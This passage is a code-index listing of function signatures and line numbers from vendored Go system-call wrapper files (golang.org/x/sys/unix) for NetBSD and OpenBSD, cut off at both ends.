int, p []byte) (n int, err error) { function Readlink (line 1403) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1425) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1447) | func Rename(from string, to string) (err error) { function Renameat (line 1467) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1487) | func Revoke(path string) (err error) { function Rmdir (line 1502) | func Rmdir(path string) (err error) { function Seek (line 1517) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1528) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1539) | func Setegid(egid int) (err error) { function Seteuid (line 1549) | func Seteuid(euid int) (err error) { function Setgid (line 1559) | func Setgid(gid int) (err error) { function Setpgid (line 1569) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1579) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1589) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1599) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1609) | func Setsid() (pid int, err error) { function Settimeofday (line 1620) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1630) | func Setuid(uid int) (err error) { function Stat (line 1640) | func Stat(path string, stat *Stat_t) (err error) { function Statvfs1 (line 1655) | func Statvfs1(path string, buf *Statvfs_t, flags int) (err error) { function Symlink (line 1670) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1690) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1710) | func Sync() (err error) { function Truncate (line 1720) | func Truncate(path string, length int64) (err error) { function Umask (line 1735) | func Umask(newmask int) (oldmask int) { function Unlink (line 1743) | func Unlink(path string) (err error) { function Unlinkat (line 1758) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1773) | func Unmount(path string, flags int) (err error) { function write (line 1788) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1805) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1816) | func munmap(addr uintptr, length uintptr) (err error) { function utimensat (line 1826) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function mremapNetBSD (line 1841) | func mremapNetBSD(oldp uintptr, oldsize uintptr, newp uintptr, newsize u... FILE: vendor/golang.org/x/sys/unix/zsyscall_netbsd_arm.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 363) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 380) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 397) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 407) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 417) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function Access (line 433) | func Access(path string, mode uint32) (err error) { function Adjtime (line 448) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 458) | func Chdir(path string) (err error) { function Chflags (line 473) | func Chflags(path string, flags int) (err error) { function Chmod (line 488) | func Chmod(path string, mode uint32) (err error) { function Chown (line 503) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 518) | func Chroot(path string) (err error) { function ClockGettime (line 533) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 543) | func Close(fd int) (err error) { function Dup (line 553) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 564) | func Dup2(from int, to int) (err error) { function Dup3 (line 574) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 584) | func Exit(code int) { function ExtattrGetFd (line 591) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 607) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 623) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 638) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 649) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 670) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 691) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 711) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 727) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 748) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 769) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 789) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Faccessat (line 805) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fadvise (line 820) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchdir (line 830) | func Fchdir(fd int) (err error) { function Fchflags (line 840) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 850) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 860) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 875) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 885) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 900) | func Flock(fd int, how int) (err error) { function Fpathconf (line 910) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 921) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 931) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatvfs1 (line 946) | func Fstatvfs1(fd int, buf *Statvfs_t, flags int) (err error) { function Fsync (line 956) | func Fsync(fd int) (err error) { function Ftruncate (line 966) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 976) | func Getegid() (egid int) { function Geteuid (line 984) | func Geteuid() (uid int) { function Getgid (line 992) | func Getgid() (gid int) { function Getpgid (line 1000) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1011) | func Getpgrp() (pgrp int) { function Getpid (line 1019) | func Getpid() (pid int) { function Getppid (line 1027) | func Getppid() (ppid int) { function Getpriority (line 1035) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1046) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1056) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1066) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1077) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1087) | func Getuid() (uid int) { function Issetugid (line 1095) | func Issetugid() (tainted bool) { function Kill (line 1103) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1113) | func Kqueue() (fd int, err error) { function Lchown (line 1124) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1139) | func Link(path string, link string) (err error) { function Linkat (line 1159) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1179) | func Listen(s int, backlog int) (err error) { function Lstat (line 1189) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1204) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1219) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1234) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1249) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1264) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1279) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1294) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1304) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1320) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1336) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1352) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1369) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1386) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1403) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1425) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1447) | func Rename(from string, to string) (err error) { function Renameat (line 1467) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1487) | func Revoke(path string) (err error) { function Rmdir (line 1502) | func Rmdir(path string) (err error) { function Seek (line 1517) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1528) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1539) | func Setegid(egid int) (err error) { function Seteuid (line 1549) | func Seteuid(euid int) (err error) { function Setgid (line 1559) | func Setgid(gid int) (err error) { function Setpgid (line 1569) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1579) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1589) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1599) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1609) | func Setsid() (pid int, err error) { function Settimeofday (line 1620) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1630) | func Setuid(uid int) (err error) { function Stat (line 1640) | func Stat(path string, stat *Stat_t) (err error) { function Statvfs1 (line 1655) | func Statvfs1(path string, buf *Statvfs_t, flags int) (err error) { function Symlink (line 1670) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1690) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1710) | func Sync() (err error) { function Truncate (line 1720) | func Truncate(path string, length int64) (err error) { function Umask (line 1735) | func Umask(newmask int) (oldmask int) { function Unlink (line 1743) | func Unlink(path string) (err error) { function Unlinkat (line 1758) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1773) | func Unmount(path string, flags int) (err error) { function write (line 1788) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1805) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1816) | func munmap(addr uintptr, length uintptr) (err error) { function utimensat (line 1826) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function mremapNetBSD (line 1841) | func mremapNetBSD(oldp uintptr, oldsize uintptr, newp uintptr, newsize u... FILE: vendor/golang.org/x/sys/unix/zsyscall_netbsd_arm64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 363) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 380) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 397) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 407) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 417) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function Access (line 433) | func Access(path string, mode uint32) (err error) { function Adjtime (line 448) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 458) | func Chdir(path string) (err error) { function Chflags (line 473) | func Chflags(path string, flags int) (err error) { function Chmod (line 488) | func Chmod(path string, mode uint32) (err error) { function Chown (line 503) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 518) | func Chroot(path string) (err error) { function ClockGettime (line 533) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 543) | func Close(fd int) (err error) { function Dup (line 553) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 564) | func Dup2(from int, to int) (err error) { function Dup3 (line 574) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 584) | func Exit(code int) { function ExtattrGetFd (line 591) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 607) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 623) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 638) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 649) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 670) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 691) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 711) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 727) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 748) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 769) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 789) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Faccessat (line 805) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fadvise (line 820) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchdir (line 830) | func Fchdir(fd int) (err error) { function Fchflags (line 840) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 850) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 860) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 875) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 885) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 900) | func Flock(fd int, how int) (err error) { function Fpathconf (line 910) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 921) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 931) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatvfs1 (line 946) | func Fstatvfs1(fd int, buf *Statvfs_t, flags int) (err error) { function Fsync (line 956) | func Fsync(fd int) (err error) { function Ftruncate (line 966) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 976) | func Getegid() (egid int) { function Geteuid (line 984) | func Geteuid() (uid int) { function Getgid (line 992) | func Getgid() (gid int) { function Getpgid (line 1000) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1011) | func Getpgrp() (pgrp int) { function Getpid (line 1019) | func Getpid() (pid int) { function Getppid (line 1027) | func Getppid() (ppid int) { function Getpriority (line 1035) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1046) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1056) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1066) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1077) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1087) | func Getuid() (uid int) { function Issetugid (line 1095) | func Issetugid() (tainted bool) { function Kill (line 1103) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1113) | func Kqueue() (fd int, err error) { function Lchown (line 1124) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1139) | func Link(path string, link string) (err error) { function Linkat (line 1159) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1179) | func Listen(s int, backlog int) (err error) { function Lstat (line 1189) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1204) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1219) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1234) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1249) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1264) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1279) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1294) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1304) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1320) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1336) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1352) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1369) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1386) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1403) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1425) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1447) | func Rename(from string, to string) (err error) { function Renameat (line 1467) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1487) | func Revoke(path string) (err error) { function Rmdir (line 1502) | func Rmdir(path string) (err error) { function Seek (line 1517) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1528) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1539) | func Setegid(egid int) (err error) { function Seteuid (line 1549) | func Seteuid(euid int) (err error) { function Setgid (line 1559) | func Setgid(gid int) (err error) { function Setpgid (line 1569) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1579) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1589) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1599) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1609) | func Setsid() (pid int, err error) { function Settimeofday (line 1620) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1630) | func Setuid(uid int) (err error) { function Stat (line 1640) | func Stat(path string, stat *Stat_t) (err error) { function Statvfs1 (line 1655) | func Statvfs1(path string, buf *Statvfs_t, flags int) (err error) { function Symlink (line 1670) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1690) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1710) | func Sync() (err error) { function Truncate (line 1720) | func Truncate(path string, length int64) (err error) { function Umask (line 1735) | func Umask(newmask int) (oldmask int) { function Unlink (line 1743) | func Unlink(path string) (err error) { function Unlinkat (line 1758) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1773) | func Unmount(path string, flags int) (err error) { function write (line 1788) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1805) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1816) | func munmap(addr uintptr, length uintptr) (err error) { function utimensat (line 1826) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function mremapNetBSD (line 1841) | func mremapNetBSD(oldp uintptr, oldsize uintptr, newp uintptr, newsize u... FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_386.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func 